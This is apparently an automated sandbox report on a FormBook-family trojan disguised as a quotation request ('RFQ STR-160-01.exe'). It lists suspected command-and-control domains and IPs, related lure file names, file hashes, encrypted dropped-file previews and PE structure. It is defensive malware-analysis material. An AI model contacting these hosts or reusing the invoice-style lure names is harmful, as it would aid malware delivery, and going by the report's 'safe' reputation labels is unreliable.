            https://ac.ecosia.org/autocomplete?q=rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://wordpress.org/MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://mgmasistencia.com/xmlrpc.php?rsdMVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.redhat.com/rasdial.exe, 00000007.00000002.3996789330.00000000064C2000.00000004.10000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            176.57.64.102
            www.ayypromo.shopBosnia and Herzegowina
            47959TELINEABAfalse
            162.55.254.209
            www.anaidittrich.comUnited States
            35893ACPCAfalse
            167.172.133.32
            www.onlytradez.clubUnited States
            14061DIGITALOCEAN-ASNUSfalse
            18.183.3.45
            www.cannulafactory.topUnited States
            16509AMAZON-02USfalse
            194.233.65.154
            weep.siteGermany
            6659NEXINTO-DEfalse
            103.224.182.242
            www.xforum.techAustralia
            133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
            45.157.69.194
            www.88nn.proGermany
            136933GIGABITBANK-AS-APGigabitbankGlobalHKfalse
            66.29.149.180
            www.jaxo.xyzUnited States
            19538ADVANTAGECOMUStrue
            37.187.158.211
            fontanerourgente.netFrance
            16276OVHFRfalse
            206.119.82.116
            32wxd.topUnited States
            174COGENT-174USfalse
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1502761
            Start date and time:2024-09-02 09:06:15 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 9m 14s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Run name:Run with higher sleep bypass
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:RFQ STR-160-01.exe
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@7/5@11/10
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 91%
            • Number of executed functions: 50
            • Number of non-executed functions: 295
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            TimeTypeDescription
            03:08:18API Interceptor6014463x Sleep call for process: rasdial.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            176.57.64.102#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • www.ayypromo.shop/mktg/
            031215-Revised-01.exeGet hashmaliciousFormBookBrowse
            • www.ayypromo.shop/rgqx/
            Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
            • www.ayypromo.shop/rgqx/
            Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • www.ayypromo.shop/mktg/
            TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
            • www.ayypromo.shop/6ocx/
            162.55.254.209Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
            • www.anaidittrich.com/qpwk/
            167.172.133.32031215-Revised-01.exeGet hashmaliciousFormBookBrowse
            • www.onlytradez.club/zctj/
            Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
            • www.onlytradez.club/zctj/
            RCZ-PI-4057.exeGet hashmaliciousFormBookBrowse
            • www.onlytradez.club/zctj/
            APS-0240226.exeGet hashmaliciousFormBookBrowse
            • www.onlytradez.club/zctj/
            Contract.exeGet hashmaliciousFormBookBrowse
            • www.onlytradez.club/h6ky/
            draft Proforma Invoice.exeGet hashmaliciousFormBookBrowse
            • www.onlytradez.club/h6ky/
            18.183.3.45#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • www.cannulafactory.top/y82c/
            031215-Revised-01.exeGet hashmaliciousFormBookBrowse
            • www.cannulafactory.top/l90v/
            Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
            • www.cannulafactory.top/l90v/
            RCZ-PI-4057.exeGet hashmaliciousFormBookBrowse
            • www.cannulafactory.top/l90v/
            APS-0240226.exeGet hashmaliciousFormBookBrowse
            • www.cannulafactory.top/l90v/
            Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • www.cannulafactory.top/y82c/
            194.233.65.154quotation.exeGet hashmaliciousDarkTortilla, FormBookBrowse
            • www.weep.site/s05y/?lz=gDGbNZhd39jJRtKZsSz2sE2ibzdbN3TQtRc66BLH0/M6yu03EwHRmA2X+hqgqZY0iQlGVL/r5voLrOg76rHLRWH5eVpWuwJaYbwgWM3iOeHIoJ4t/7eG5v8=&pbM=rVxTT
            Shipping document_pdf.exeGet hashmaliciousFormBookBrowse
            • www.weep.site/yigx/
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            www.ayypromo.shop#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • 176.57.64.102
            031215-Revised-01.exeGet hashmaliciousFormBookBrowse
            • 176.57.64.102
            Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
            • 176.57.64.102
            Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • 176.57.64.102
            TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
            • 176.57.64.102
            www.jaxo.xyz031215-Revised-01.exeGet hashmaliciousFormBookBrowse
            • 66.29.149.180
            Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
            • 66.29.149.180
            RCZ-PI-4057.exeGet hashmaliciousFormBookBrowse
            • 66.29.149.180
            APS-0240226.exeGet hashmaliciousFormBookBrowse
            • 66.29.149.180
            www.cannulafactory.top#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • 18.183.3.45
            031215-Revised-01.exeGet hashmaliciousFormBookBrowse
            • 18.183.3.45
            Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
            • 18.183.3.45
            RCZ-PI-4057.exeGet hashmaliciousFormBookBrowse
            • 18.183.3.45
            APS-0240226.exeGet hashmaliciousFormBookBrowse
            • 18.183.3.45
            Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • 18.183.3.45
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            NEXINTO-DEmirai.mips.elfGet hashmaliciousMiraiBrowse
            • 194.195.59.215
            SecuriteInfo.com.Linux.Siggen.9999.19003.7982.elfGet hashmaliciousMiraiBrowse
            • 212.228.122.21
            quotation.exeGet hashmaliciousDarkTortilla, FormBookBrowse
            • 194.233.65.154
            Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
            • 194.195.220.41
            031215-Revised-01.exeGet hashmaliciousFormBookBrowse
            • 194.233.65.154
            Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
            • 194.233.65.154
            RCZ-PI-4057.exeGet hashmaliciousFormBookBrowse
            • 194.233.65.154
            APS-0240226.exeGet hashmaliciousFormBookBrowse
            • 194.233.65.154
            Shipping document_pdf.exeGet hashmaliciousFormBookBrowse
            • 194.233.65.154
            arm.elfGet hashmaliciousMiraiBrowse
            • 212.229.153.86
            DIGITALOCEAN-ASNUSSecuriteInfo.com.Win32.CrypterX-gen.24939.766.exeGet hashmaliciousLokibotBrowse
            • 104.248.205.66
            https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1EGet hashmaliciousHTMLPhisherBrowse
            • 104.248.15.35
            https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1EGet hashmaliciousUnknownBrowse
            • 159.65.33.93
            gdvfd35.exeGet hashmaliciousNeconydBrowse
            • 64.225.91.73
            detail.pdfGet hashmaliciousUnknownBrowse
            • 157.245.113.153
            trSK2fqPeB.exeGet hashmaliciousAmadey, RedLine, XWorm, XmrigBrowse
            • 161.35.34.195
            https://login.ap-financier.com/Get hashmaliciousUnknownBrowse
            • 162.243.175.152
            http://www.kraftpaints.ro/eve/pdfonline-3d2-new-bg2/pdfonline-3d2-new.bg2/pdfonline-3d2-newbg2/index.htmlGet hashmaliciousHTMLPhisherBrowse
            • 162.243.175.152
            https://login.ap-financier.com/TaqWmoGvGet hashmaliciousHTMLPhisherBrowse
            • 162.243.175.152
            https://tt.vg/ameli-portailas45Get hashmaliciousUnknownBrowse
            • 198.199.109.95
            ACPCAfirmware.arm-linux-gnueabihf.elfGet hashmaliciousUnknownBrowse
            • 162.48.22.207
            PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
            • 162.0.213.94
            estado de cuenta adjunto.exeGet hashmaliciousFormBookBrowse
            • 162.0.213.72
            Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
            • 162.0.213.72
            https://bio.to/vCOt6dGet hashmaliciousHTMLPhisherBrowse
            • 162.0.217.108
            z1209627360293827.exeGet hashmaliciousDBatLoader, FormBookBrowse
            • 162.0.213.72
            REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 162.0.213.94
            factura-630.900.exeGet hashmaliciousFormBookBrowse
            • 162.0.213.94
            709876765465.exeGet hashmaliciousDBatLoader, FormBookBrowse
            • 162.0.213.72
            PAGO $630.900.exeGet hashmaliciousFormBookBrowse
            • 162.0.213.94
            TELINEABA#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • 176.57.64.102
            031215-Revised-01.exeGet hashmaliciousFormBookBrowse
            • 176.57.64.102
            Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
            • 176.57.64.102
            Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • 176.57.64.102
            TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
            • 176.57.64.102
            sKQrQ9KjPJ.elfGet hashmaliciousMiraiBrowse
            • 88.214.61.219
            KE4cyjDEDO.elfGet hashmaliciousMiraiBrowse
            • 88.214.61.224
            http://91.223.169.83Get hashmaliciousUnknownBrowse
            • 91.223.169.83
            2hUhvRdIqt.elfGet hashmaliciousMiraiBrowse
            • 88.214.61.255
            PkQB1rE5kK.elfGet hashmaliciousMiraiBrowse
            • 88.214.61.240
            AMAZON-02USgzKChQm.wsfGet hashmaliciousUnknownBrowse
            • 13.225.78.22
            mirai.dbg.elfGet hashmaliciousMiraiBrowse
            • 54.240.64.109
            mirai.m68k.elfGet hashmaliciousMiraiBrowse
            • 52.212.101.59
            mirai.mpsl.elfGet hashmaliciousMiraiBrowse
            • 173.231.90.184
            mirai.ppc.elfGet hashmaliciousMiraiBrowse
            • 35.182.109.194
            mirai.x86.elfGet hashmaliciousMiraiBrowse
            • 52.41.237.188
            mirai.spc.elfGet hashmaliciousMiraiBrowse
            • 54.171.230.55
            hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 34.249.145.219
            mirai.arm.elfGet hashmaliciousMiraiBrowse
            • 44.249.210.176
            uDkSK3X9N7.exeGet hashmaliciousPonyBrowse
            • 54.70.73.128
            No context
            No context
            Process:C:\Windows\SysWOW64\rasdial.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1239949490932863
            Encrypted:false
            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
            MD5:271D5F995996735B01672CF227C81C17
            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
            Malicious:false
            Reputation:high, very likely benign file
            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\RFQ STR-160-01.exe
            File Type:data
            Category:dropped
            Size (bytes):286208
            Entropy (8bit):7.992808762391082
            Encrypted:true
            SSDEEP:6144:Hg8RlD5zwLfDmhjiL4DhwATVONCwToeWziIQajYUEiZI2Bqpg5K6djxg6K:A81M2hq0TY5oYL9UEiHNK6djCv
            MD5:ABFDAD567188DDF51AE113091CF4E252
            SHA1:EF83FAED15D0658755E1D4B291F693E930B06971
            SHA-256:8233AB570C475339B0D1DA3FA419A08142FC3A5B3303FF1E75A29395F9536C26
            SHA-512:61E60A5FCE2EA6CC5C583F7854562BF96519CED96C67262B63ED23DDC5CB155A1FD3D90CF16F434F859892AD898E32702081ECBF8D4CBEC1E0358A9E10F010CE
            Malicious:false
            Reputation:low
            Preview:...f.ETXR..J....q.BF..eY@...CBM4BETXRMZHCA4CBM4BETXRMZHCA4.BM4LZ.VR.S.b.5..l`*,'x"?5/1 Yc!,Z,* x0(z:6/.*,mp..t5=)?fNL>gBM4BETX+LS.~!S..-S.x4?.W..{T$.W..h85.@...#%.f+&<e2*.HCA4CBM4..TX.L[H....BM4BETXR.ZJBJ5HBMxFETXRMZHCA.VBM4RETX2IZHC.4CRM4BGTXTMZHCA4CDM4BETXRM:LCA6CBM4BEVX..ZHSA4SBM4BUTXBMZHCA4SBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHm5Q;6M4BQ.\RMJHCAxGBM$BETXRMZHCA4CBM.BE4XRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRM
            Process:C:\Users\user\Desktop\RFQ STR-160-01.exe
            File Type:data
            Category:dropped
            Size (bytes):14436
            Entropy (8bit):7.61675488516128
            Encrypted:false
            SSDEEP:384:tKlUZ32gWEgbRqwnosgm73YkbNJ2CZjHZyuVjqhkxC4wSMo6R7I72gId:tKlUZGgWEFVm7bN4CrwzNJGFId
            MD5:871AE521514F9A83C315F48381B9665C
            SHA1:82CDA456E503CCF115F0E4FBCD34368B634DAE52
            SHA-256:B9610241638C2F90CFF9B4E7FEA6177D3908966CA74CD9F283FC8BB66FE65C9C
            SHA-512:14D004B56B9A640AD3104C53C18FDCB2370B9A82E48D707A838B5719C931F54AEC8077266739A966235523A82285AA5C51A49F9210F018B89BB30E3B731B9614
            Malicious:false
            Reputation:low
            Preview:EA06..0..M...../.....c..f@.[....P.].@.[..+8.2.f`........e..:......7..7..#|Sp.....?. ... .....|. ..`....C.j.}.X..75.}......`.}.@(>...Y..w4.m....0....,.....}|.0....r............._|S.*......0.o..w...F...;...|60).....|3@...h.Q.L@%.7.......7.T.g.*.5..?.......2.F.g.......5.f...y4.^...>p......B...|.._...?v`Q......M....(...=.....c...f.....W.9......3._.@..e...A..k ...a....O>).4..f.}..?...3 ....C......#.X.g.8.... 6.......1.Y.F?.....Gc.....@#...........l`F..E..c........#..]..c...A....<|.....<~.._.]..........y4...@.~{02/.3...._4...v .O.....|.@jO......M..>`.......|.~....,.m.X..&.........>.. >p5....<~.P....a..@..9.Z.,.X.X...4.,...O~p..L.C....A..2.......p&.....K..@..b....@..X.G.3.............. ..?..@|.._<..C....|.P...n.y..@...).j.+.X.->..(..a.&.l......k......>p........X..P!~M..>`./...-..#?......#.^|._.....[....| 7...g.0.h.,aU_.B....Y...}..<...| ..<........|>)..V.....$........B~..A.......|V ./....)_.4..S..J.@H...7..<#.....~3p............> g/..o. ...d).....`5...W..%..D
            Process:C:\Users\user\Desktop\RFQ STR-160-01.exe
            File Type:ASCII text, with very long lines (65536), with no line terminators
            Category:dropped
            Size (bytes):143370
            Entropy (8bit):2.661669865181689
            Encrypted:false
            SSDEEP:384:KrYq11YnBr4syysilnSWxNesmlzuhYjb3WUgQom0LYQ:/
            MD5:90087ADDB244F27BDC24B5E0659F667C
            SHA1:E4F3E883B8BC92A1EBCED4C886478BE6BEFF53B4
            SHA-256:11E3806B5ECF64E78C1C1E4257B1562762549F5B90DAE4D0D8AA0D3B71B4430D
            SHA-512:C63A241F3FC8EE677FB8B8FE3FEE2272B7B97FDFA3E7271EA870DFC920F8AA3A82692AE66E6545BB63054363962F20816D6BCDB91AEC7E2C866B7AC86A31B6A6
            Malicious:false
            Preview:0650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504
            Process:C:\Users\user\Desktop\RFQ STR-160-01.exe
            File Type:data
            Category:dropped
            Size (bytes):286208
            Entropy (8bit):7.992808762391082
            Encrypted:true
            SSDEEP:6144:Hg8RlD5zwLfDmhjiL4DhwATVONCwToeWziIQajYUEiZI2Bqpg5K6djxg6K:A81M2hq0TY5oYL9UEiHNK6djCv
            MD5:ABFDAD567188DDF51AE113091CF4E252
            SHA1:EF83FAED15D0658755E1D4B291F693E930B06971
            SHA-256:8233AB570C475339B0D1DA3FA419A08142FC3A5B3303FF1E75A29395F9536C26
            SHA-512:61E60A5FCE2EA6CC5C583F7854562BF96519CED96C67262B63ED23DDC5CB155A1FD3D90CF16F434F859892AD898E32702081ECBF8D4CBEC1E0358A9E10F010CE
            Malicious:false
            Preview:...f.ETXR..J....q.BF..eY@...CBM4BETXRMZHCA4CBM4BETXRMZHCA4.BM4LZ.VR.S.b.5..l`*,'x"?5/1 Yc!,Z,* x0(z:6/.*,mp..t5=)?fNL>gBM4BETX+LS.~!S..-S.x4?.W..{T$.W..h85.@...#%.f+&<e2*.HCA4CBM4..TX.L[H....BM4BETXR.ZJBJ5HBMxFETXRMZHCA.VBM4RETX2IZHC.4CRM4BGTXTMZHCA4CDM4BETXRM:LCA6CBM4BEVX..ZHSA4SBM4BUTXBMZHCA4SBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHm5Q;6M4BQ.\RMJHCAxGBM$BETXRMZHCA4CBM.BE4XRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRMZHCA4CBM4BETXRM
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.1542983884620535
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:RFQ STR-160-01.exe
            File size:1'229'312 bytes
            MD5:33b97929531dcc9308fce497cd75ed3b
            SHA1:a6adc359e420476701e5d97ae872436bfa730710
            SHA256:4f6d14b81ef333607075b46913e6cb434d5003f37f2a1f372e0328b44af5e76e
            SHA512:6d35bebf54efb6dfe887706018ad064f3a51ff549db0a92e34d72e154f49499b6ca318115f1dbf0fc7da9ab9ac05f7912e6c211dce59b4b51675310c7be94edf
            SSDEEP:24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8aIRA+IbWQzdokRt:aTvC/MTQYxsWR7aIix6gdok
            TLSH:E945C0027391C062FF9B91334F9AF6115BBC6A260123E61F13981DB9BE705B1563E7A3
            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
            Icon Hash:526e6c5250ecf047
            Entrypoint:0x420577
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
            Time Stamp:0x66D4EF0A [Sun Sep 1 22:47:38 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:948cc502fe9226992dce9417f952fce3
            Instruction
            call 00007F22B8D07523h
            jmp 00007F22B8D06E2Fh
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007F22B8D0700Dh
            mov dword ptr [esi], 0049FDF0h
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 0049FDF8h
            mov dword ptr [ecx], 0049FDF0h
            ret
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007F22B8D06FDAh
            mov dword ptr [esi], 0049FE0Ch
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 0049FE14h
            mov dword ptr [ecx], 0049FE0Ch
            ret
            push ebp
            mov ebp, esp
            push esi
            mov esi, ecx
            lea eax, dword ptr [esi+04h]
            mov dword ptr [esi], 0049FDD0h
            and dword ptr [eax], 00000000h
            and dword ptr [eax+04h], 00000000h
            push eax
            mov eax, dword ptr [ebp+08h]
            add eax, 04h
            push eax
            call 00007F22B8D09BCDh
            pop ecx
            pop ecx
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            lea eax, dword ptr [ecx+04h]
            mov dword ptr [ecx], 0049FDD0h
            push eax
            call 00007F22B8D09C18h
            pop ecx
            ret
            push ebp
            mov ebp, esp
            push esi
            mov esi, ecx
            lea eax, dword ptr [esi+04h]
            mov dword ptr [esi], 0049FDD0h
            push eax
            call 00007F22B8D09C01h
            test byte ptr [ebp+08h], 00000001h
            pop ecx
            Programming Language:
            • [ C ] VS2008 SP1 build 30729
            • [IMP] VS2008 SP1 build 30729
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5571c.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x12a0000x7594.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0xd40000x5571c0x5580065dc3656b86e2aba81da94051978f7f3False0.9659859283625731data7.965193360217968IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x12a0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_ICON0xd44880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
            RT_ICON0xd45b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
            RT_ICON0xd46d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
